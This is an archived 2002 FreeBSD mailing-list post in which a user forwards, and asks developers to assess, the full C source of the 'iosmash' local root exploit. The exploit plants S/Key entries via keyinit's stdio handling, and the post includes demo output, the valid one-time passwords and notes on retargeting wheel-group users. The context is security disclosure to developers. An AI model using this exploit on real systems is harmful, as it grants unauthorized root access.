Date: Thu, 25 Apr 2002 14:22:10 +0600 From: "Vladimir G. Drobyshevsky" <vlad@telecom.ural.ru> To: freebsd-stable@freebsd.org, freebsd-current@freebsd.org Subject: FreeBSD security hole? Message-ID: <129604079.20020425142210@telecom.ural.ru>
next in thread | raw e-mail | index | archive | help
Have a nice day! Yesterday I received that message from one of linux guys: --- forward message --- /* phased/b10z phased@snosoft.com <mailto:phased@snosoft.com> 23/04/2002 stdio kernel bug in All releases of FreeBSD up to and including 4.5-RELEASE decided to make a trivial exploit to easily get root :) > id uid=1003(phased) gid=999(phased) groups=999(phased) > ./iosmash Adding phased: <--- HIT CTRL-C ---> > su s/key 98 snosoft2 Password:MASS OAT ROLL TOOL AGO CAM xes# this program makes the following skeys valid 95: CARE LIVE CARD LOFT CHIC HILL 96: TESS OIL WELD DUD MUTE KIT 97: DADE BED DRY JAW GRAB NOV 98: MASS OAT ROLL TOOL AGO CAM 99: DARK LEW JOLT JIVE MOS WHO <http://www.snosoft.com>; cheers Joost Pol */ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { while(dup(1) != -1); close(2); execl("/usr/bin/keyinit", "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n"); } --- forward message --- He ask me to verify that information. I did. And it works. And the second message that I recived today: --- message --- phased had some comments he wanted me to forward on to the lists in regards to his latest exploit. He says that skeys are used via all authentication methods... i.e telnet, so someone could change the user to someone in the wheel group. Haven't used skeys via ssh yet but I presume it works. Root obviously can't just telnet in by default but usually can ssh, but if the box being exploited contains people in the wheel group you can change the root user in the exploit to any user to log in via skeys as that user. --- message --- I not so well understand in interiors of system, I only see, that during 30 seconds have got access to the root account (of course, from the account of the user who is included in group wheel, differently su, naturally, not gives access). Therefore I ask to comment on these messages. How dangerous can it be? -- Sincerelly yours, Vl To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-stable" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?129604079.20020425142210>